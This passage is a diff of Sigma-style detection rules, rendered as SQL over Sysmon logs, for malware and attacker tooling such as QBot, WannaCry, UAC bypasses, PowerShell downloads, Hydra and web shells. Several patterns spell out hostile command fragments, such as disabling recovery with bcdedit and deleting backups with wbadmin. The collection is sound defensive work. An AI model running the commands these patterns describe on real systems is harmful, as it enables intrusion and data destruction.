QBot", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.execution", + "attack.t1059.005" + ], + "falsepositives": [ + "Unlikely" + ], + "level": "critical", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\WinRAR.exe' ESCAPE '\\' AND Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR CommandLine LIKE '% /c ping.exe -n 6 127.0.0.1 & type %' ESCAPE '\\' OR (CommandLine LIKE 
'%regsvr32.exe%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData%' ESCAPE '\\' AND CommandLine LIKE '%.tmp%' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_malware_qbot.yml" + }, + { + "title": "Terminal Service Process Spawn", + "id": "1012f107-b8f1-4271-af30-5aed2de89b39", "status": "test", - "description": "Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.initial_access", + "attack.t1190", + "attack.lateral_movement", + "attack.t1210", + "car.2013-07-002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\"\\\\system32\\\\cleanmgr.exe /autoclean /d C:' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentCommandLine LIKE '%\\\\svchost.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%termsvcs%' ESCAPE '\\') AND NOT (((Image LIKE '%\\\\rdpclip.exe' ESCAPE '\\' OR Image LIKE '%:\\\\Windows\\\\System32\\\\csrss.exe' ESCAPE '\\' OR Image LIKE '%:\\\\Windows\\\\System32\\\\wininit.exe' ESCAPE '\\' OR Image LIKE '%:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\')) OR (Image = '')))" ], - "filename": "proc_creation_win_uac_bypass_cleanmgr.yml" + "filename": "proc_creation_win_svchost_termserv_proc_spawn.yml" }, { - "title": "Potential Defense Evasion Via Right-to-Left Override", - "id": 
"ad691d92-15f2-4181-9aa4-723c74f9ddc3", + "title": "Use NTFS Short Name in Image", + "id": "3ef5605c-9eb9-47b0-9a71-b727e6aa5c3b", "status": "experimental", - "description": "Detects the presence of the \"u202+E\" character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence.\nThis is used as an obfuscation and masquerading techniques.\n", - "author": "Micah Babinski, @micahbabinski", + "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image based detection", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1036.002" + "attack.t1564.004" ], "falsepositives": [ - "Commandlines that contains scriptures such as arabic or hebrew might make use of this character" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%‮%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%~1.exe%' ESCAPE '\\' OR Image LIKE '%~1.bat%' ESCAPE '\\' OR Image LIKE '%~1.msi%' ESCAPE '\\' OR Image LIKE '%~1.vbe%' ESCAPE '\\' OR Image LIKE '%~1.vbs%' ESCAPE '\\' OR Image LIKE '%~1.dll%' ESCAPE '\\' OR Image LIKE '%~1.ps1%' ESCAPE '\\' OR Image LIKE '%~1.js%' ESCAPE '\\' OR Image LIKE '%~1.hta%' ESCAPE '\\' OR Image LIKE '%~2.exe%' ESCAPE '\\' OR Image LIKE '%~2.bat%' ESCAPE '\\' OR Image LIKE '%~2.msi%' ESCAPE '\\' OR Image LIKE '%~2.vbe%' ESCAPE '\\' OR Image LIKE '%~2.vbs%' ESCAPE '\\' OR Image LIKE '%~2.dll%' ESCAPE '\\' OR Image LIKE '%~2.ps1%' ESCAPE '\\' OR Image LIKE '%~2.js%' ESCAPE '\\' OR Image LIKE '%~2.hta%' ESCAPE '\\') AND NOT ((ParentImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\thor\\\\thor64.exe' ESCAPE '\\' OR ParentImage LIKE '%-installer.exe' ESCAPE '\\') OR Image LIKE '%\\\\vcredi%' ESCAPE '\\' OR 
ParentImage LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_right_to_left_override.yml" + "filename": "proc_creation_win_susp_ntfs_short_name_use_image.yml" }, { - "title": "UAC Bypass Using IEInstal - Process", - "id": "80fc36aa-945e-4181-89f2-2f907ab6775d", + "title": "Suspicious UltraVNC Execution", + "id": "871b9555-69ca-4993-99d3-35a59f9f3599", "status": "test", - "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects suspicious UltraVNC command line flag combination that indicate a auto reconnect upon execution, e.g. startup (as seen being used by Gamaredon threat group)", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.lateral_movement", + "attack.g0047", + "attack.t1021.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND IntegrityLevel IN ('High', 'System') AND ParentImage LIKE '%\\\\ieinstal.exe' ESCAPE '\\' AND Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND Image LIKE '%consent.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-autoreconnect %' ESCAPE '\\' AND CommandLine LIKE '%-connect %' ESCAPE '\\' AND CommandLine LIKE '%-id:%' ESCAPE '\\')" ], - "filename": "proc_creation_win_uac_bypass_ieinstal.yml" + "filename": "proc_creation_win_ultravnc_susp_execution.yml" }, { - "title": "PowerShell DownloadFile", - "id": "8f70ac5f-1f6f-4f8e-b454-db19561216c5", - "status": "test", - "description": "Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line", + "title": "HackTool - Htran/NATBypass Execution", + "id": 
"f5e3b62f-e577-4e59-931e-0a15b2b94e1e", + "status": "experimental", + "description": "Detects exeuctable names or flags used by Htran or Htran-like tools (e.g. NATBypass)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", "attack.command_and_control", - "attack.t1104", - "attack.t1105" + "attack.t1090", + "attack.s0040" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%.DownloadFile%' ESCAPE '\\' AND CommandLine LIKE '%System.Net.WebClient%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\htran.exe' ESCAPE '\\' OR Image LIKE '%\\\\lcx.exe' ESCAPE '\\') OR (CommandLine LIKE '%.exe -tran %' ESCAPE '\\' OR CommandLine LIKE '%.exe -slave %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_susp_ps_downloadfile.yml" + "filename": "proc_creation_win_hktl_htran_or_natbypass.yml" }, { - "title": "Formbook Process Creation", - "id": "032f5fb3-d959-41a5-9263-4173c802dc2b", + "title": "Using SettingSyncHost.exe as LOLBin", + "id": "b2ddd389-f676-4ac4-845a-e00781a48e5f", "status": "test", - "description": "Detects Formbook like process executions that inject code into a set of files in the System32 folder, which executes a special command command line to delete the dropper from the AppData Temp folder. 
We avoid false positives by excluding all parent process with command line parameters.", - "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", + "description": "Detects using SettingSyncHost.exe to run hijacked binary", + "author": "Anton Kutepov, oscd.community", "tags": [ - "attack.resource_development", - "attack.t1587.001" + "attack.execution", + "attack.defense_evasion", + "attack.t1574.008" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentCommandLine LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ParentCommandLine LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') AND ParentCommandLine LIKE '%.exe' ESCAPE '\\') AND ((CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%del%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%del%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%type nul >%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\')) AND CommandLine LIKE '%.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')) AND (ParentCommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' AND ParentCommandLine LIKE '%RoamDiag.cmd%' ESCAPE '\\' AND ParentCommandLine LIKE '%-outputpath%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_formbook.yml" + "filename": "proc_creation_win_lolbin_settingsynchost.yml" }, { - "title": "HackTool - Inveigh Execution", - "id": 
"b99a1518-1ad5-4f65-bc95-1ffff97a8fd0", - "status": "experimental", - "description": "Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - Hydra Password Bruteforce Execution", + "id": "aaafa146-074c-11eb-adc1-0242ac120002", + "status": "test", + "description": "Detects command line parameters used by Hydra password guessing hack tool", + "author": "Vasiliy Burov", "tags": [ "attack.credential_access", - "attack.t1003.001" + "attack.t1110", + "attack.t1110.001" ], "falsepositives": [ - "Very unlikely" + "Software that uses the caret encased keywords PASS and USER in its command line" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\Inveigh.exe' ESCAPE '\\' OR (OriginalFileName LIKE '\\\\Inveigh.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\Inveigh.dll' ESCAPE '\\') OR Description = 'Inveigh' OR (CommandLine LIKE '% -SpooferIP%' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToIPs %' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToDomains %' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToMACs %' ESCAPE '\\' OR CommandLine LIKE '% -SnifferIP%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-u %' ESCAPE '\\' AND CommandLine LIKE '%-p %' ESCAPE '\\' AND (CommandLine LIKE '%^USER^%' ESCAPE '\\' OR CommandLine LIKE '%^PASS^%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_inveigh.yml" + "filename": "proc_creation_win_hktl_hydra.yml" }, { - "title": "Suspicious WebDav Client Execution", - "id": "982e9f2d-1a85-4d5b-aea4-31f5e97c6555", + "title": "Suspicious New Service Creation", + "id": "17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8", "status": "experimental", - "description": "Detects \"svchost.exe\" spawning \"rundll32.exe\" with command arguments like 
C:\\windows\\system32\\davclnt.dll,DavSetCookie. This could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server) or potentially a sign of exploitation of CVE-2023-23397\n", - "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", + "description": "Detects creation of a new service via \"sc\" command or the powershell \"new-service\" cmdlet with suspicious binary paths", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1048.003", - "cve.2023.23397" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\' AND CommandLine REGEXP '://\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}') AND NOT (((CommandLine LIKE '%://10.%' ESCAPE '\\' OR CommandLine LIKE '%://192.168.%' ESCAPE '\\' OR CommandLine LIKE '%://172.16.%' ESCAPE '\\' OR CommandLine LIKE '%://172.17.%' ESCAPE '\\' OR CommandLine LIKE '%://172.18.%' ESCAPE '\\' OR CommandLine LIKE '%://172.19.%' ESCAPE '\\' OR CommandLine LIKE '%://172.20.%' ESCAPE '\\' OR CommandLine LIKE '%://172.21.%' ESCAPE '\\' OR CommandLine LIKE '%://172.22.%' ESCAPE '\\' OR CommandLine LIKE '%://172.23.%' ESCAPE '\\' OR CommandLine LIKE '%://172.24.%' ESCAPE '\\' OR CommandLine LIKE '%://172.25.%' ESCAPE '\\' OR CommandLine LIKE '%://172.26.%' ESCAPE '\\' OR CommandLine LIKE '%://172.27.%' ESCAPE '\\' OR CommandLine LIKE '%://172.28.%' ESCAPE '\\' OR CommandLine LIKE '%://172.29.%' ESCAPE '\\' OR CommandLine LIKE '%://172.30.%' ESCAPE '\\' OR CommandLine LIKE '%://172.31.%' ESCAPE '\\' OR CommandLine LIKE '%://127.%' ESCAPE '\\' OR 
CommandLine LIKE '%://169.254.%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\sc.exe' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%binPath=%' ESCAPE '\\') OR (CommandLine LIKE '%New-Service%' ESCAPE '\\' AND CommandLine LIKE '%-BinaryPathName%' ESCAPE '\\')) AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%svchost%' ESCAPE '\\' OR CommandLine LIKE '%dllhost%' ESCAPE '\\' OR CommandLine LIKE '%cmd %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_webdav_client_susp_execution.yml" + "filename": "proc_creation_win_susp_service_creation.yml" }, { - "title": "Suspicious Windows Update Agent Empty Cmdline", - "id": "52d097e2-063e-4c9c-8fbb-855c8948d135", - "status": "experimental", - "description": "Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags", - "author": "Florian Roth (Nextron Systems)", + "title": "WannaCry Ransomware Activity", + "id": "41d40bff-377a-43e2-8e1b-2e543069e079", + "status": "test", + "description": "Detects WannaCry ransomware activity", + "author": "Florian Roth (Nextron Systems), Tom U. 
@c_APT_ure (collection), oscd.community, Jonhnathan Ribeiro", + "tags": [ + "attack.lateral_movement", + "attack.t1210", + "attack.discovery", + "attack.t1083", + "attack.defense_evasion", + "attack.t1222.001", + "attack.impact", + "attack.t1486", + "attack.t1490" + ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\Wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'Wuauclt.exe') AND CommandLine LIKE '%\\\\Wuauclt.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\tasksche.exe' ESCAPE '\\' OR Image LIKE '%\\\\mssecsvc.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskdl.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskhsvc.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskse.exe' ESCAPE '\\' OR Image LIKE '%\\\\111.exe' ESCAPE '\\' OR Image LIKE '%\\\\lhdfrgui.exe' ESCAPE '\\' OR Image LIKE '%\\\\linuxnew.exe' ESCAPE '\\' OR Image LIKE '%\\\\wannacry.exe' ESCAPE '\\') OR Image LIKE '%WanaDecryptor%' ESCAPE '\\' OR (CommandLine LIKE '%icacls%' ESCAPE '\\' AND CommandLine LIKE '%/grant%' ESCAPE '\\' AND CommandLine LIKE '%Everyone:F%' ESCAPE '\\' AND CommandLine LIKE '%/T%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%/Q%' ESCAPE '\\') OR (CommandLine LIKE '%bcdedit%' ESCAPE '\\' AND CommandLine LIKE '%/set%' ESCAPE '\\' AND CommandLine LIKE '%{default}%' ESCAPE '\\' AND CommandLine LIKE '%recoveryenabled%' ESCAPE '\\' AND CommandLine LIKE '%no%' ESCAPE '\\') OR (CommandLine LIKE '%wbadmin%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%catalog%' ESCAPE '\\' AND CommandLine LIKE '%-quiet%' ESCAPE '\\') OR CommandLine LIKE '%@Please\\_Read\\_Me@.txt%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wuauclt_no_cli_flags_execution.yml" + "filename": "proc_creation_win_malware_wannacry.yml" }, 
{ - "title": "HackTool - PPID Spoofing SelectMyParent Tool Execution", - "id": "52ff7941-8211-46f9-84f8-9903efb7077d", - "status": "test", - "description": "Detects the use of parent process ID spoofing tools like Didier Stevens tool SelectMyParent", + "title": "Security Privileges Enumeration Via Whoami.EXE", + "id": "97a80ec7-0e2f-4d05-9ef4-65760e634f6b", + "status": "experimental", + "description": "Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privileges. This is often used after a privilege escalation attempt.", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1134.004" + "attack.privilege_escalation", + "attack.discovery", + "attack.t1033" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SelectMyParent.exe' ESCAPE '\\' OR (CommandLine LIKE '%PPID-spoof%' ESCAPE '\\' OR CommandLine LIKE '%ppid\\_spoof%' ESCAPE '\\' OR CommandLine LIKE '%spoof-ppid%' ESCAPE '\\' OR CommandLine LIKE '%spoof\\_ppid%' ESCAPE '\\' OR CommandLine LIKE '%ppidspoof%' ESCAPE '\\' OR CommandLine LIKE '%spoofppid%' ESCAPE '\\' OR CommandLine LIKE '%spoofedppid%' ESCAPE '\\' OR CommandLine LIKE '% -spawnto %' ESCAPE '\\') OR (OriginalFileName LIKE '%PPID-spoof%' ESCAPE '\\' OR OriginalFileName LIKE '%ppid\\_spoof%' ESCAPE '\\' OR OriginalFileName LIKE '%spoof-ppid%' ESCAPE '\\' OR OriginalFileName LIKE '%spoof\\_ppid%' ESCAPE '\\' OR OriginalFileName LIKE '%ppidspoof%' ESCAPE '\\' OR OriginalFileName LIKE '%spoofppid%' ESCAPE '\\' OR OriginalFileName LIKE '%spoofedppid%' ESCAPE '\\') OR Description = 'SelectMyParent' OR Imphash IN ('04d974875bd225f00902b4cad9af3fbc', 'a782af154c9e743ddf3f3eb2b8f3d16e', '89059503d7fbf470e68f7e63313da3ad', 'ca28337632625c8281ab8a130b3d6bad') OR (Hashes LIKE '%IMPHASH=04D974875BD225F00902B4CAD9AF3FBC%' 
ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A782AF154C9E743DDF3F3EB2B8F3D16E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89059503D7FBF470E68F7E63313DA3AD%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=CA28337632625C8281AB8A130B3D6BAD%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% /priv%' ESCAPE '\\' OR CommandLine LIKE '% -priv%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_selectmyparent.yml" + "filename": "proc_creation_win_whoami_priv_discovery.yml" }, { - "title": "DNS RCE CVE-2020-1350", - "id": "b5281f31-f9cc-4d0d-95d0-45b91c45b487", + "title": "Shells Spawned by Web Servers", + "id": "8202070f-edeb-4d31-a010-a26c72ac5600", "status": "test", - "description": "Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects web servers that spawn shell processes which could be the result of a successfully placed web shell or another attack", + "author": "Thomas Patzke, Florian Roth (Nextron Systems), Zach Stanford @svch0st, Tim Shelton, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.execution", - "attack.t1569.002" + "attack.persistence", + "attack.t1505.003", + "attack.t1190" ], "falsepositives": [ - "Unknown but benign sub processes of the Windows DNS service dns.exe" + "Particular web applications may spawn a shell process legitimately" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\System32\\\\werfault.exe' ESCAPE '\\' OR Image LIKE '%\\\\System32\\\\conhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\System32\\\\dnscmd.exe' ESCAPE '\\' 
OR Image LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ws\\_TomcatService.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\UMWorkerProcess.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentImage LIKE '%-tomcat-%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentCommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR ParentCommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\' OR ParentCommandLine LIKE '%catalina.home%' ESCAPE '\\'))) AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\arp.exe' ESCAPE '\\' OR Image LIKE '%\\\\at.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\dsget.exe' ESCAPE '\\' OR Image LIKE '%\\\\dsquery.exe' ESCAPE '\\' OR Image LIKE '%\\\\find.exe' ESCAPE '\\' OR Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR Image LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\hostname.exe' ESCAPE '\\' OR Image LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR Image LIKE '%\\\\nbtstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE 
'%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\netdom.exe' ESCAPE '\\' OR Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\netstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\nltest.exe' ESCAPE '\\' OR Image LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR Image LIKE '%\\\\ntdutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\pathping.exe' ESCAPE '\\' OR Image LIKE '%\\\\ping.exe' ESCAPE '\\' OR Image LIKE '%\\\\qprocess.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\' OR Image LIKE '%\\\\qwinsta.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\tasklist.exe' ESCAPE '\\' OR Image LIKE '%\\\\tracert.exe' ESCAPE '\\' OR Image LIKE '%\\\\ver.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wusa.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%Windows\\\\system32\\\\cmd.exe /c C:\\\\ManageEngine\\\\ADManager \"Plus\\\\ES\\\\bin\\\\elasticsearch.bat -Enode.name=RMP-NODE1 -pelasticsearch-pid.txt' ESCAPE '\\') OR (CommandLine LIKE '%sc query%' ESCAPE '\\' AND CommandLine LIKE '%ADManager Plus%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2020_1350.yml" + "filename": "proc_creation_win_webshell_spawn.yml" }, { - "title": "Renamed Jusched.EXE Execution", - "id": "edd8a48c-1b9f-4ba1-83aa-490338cd1ccb", - "status": "test", - "description": "Detects the execution of a renamed \"jusched.exe\" as seen used by the cobalt group", - "author": "Markus Neis, Swisscom", + "title": "Suspicious Parent Double Extension File Execution", + "id": "5e6a80c8-2d45-4633-9ef4-fa2671a39c5c", + "status": "experimental", + "description": "Detect execution of suspicious 
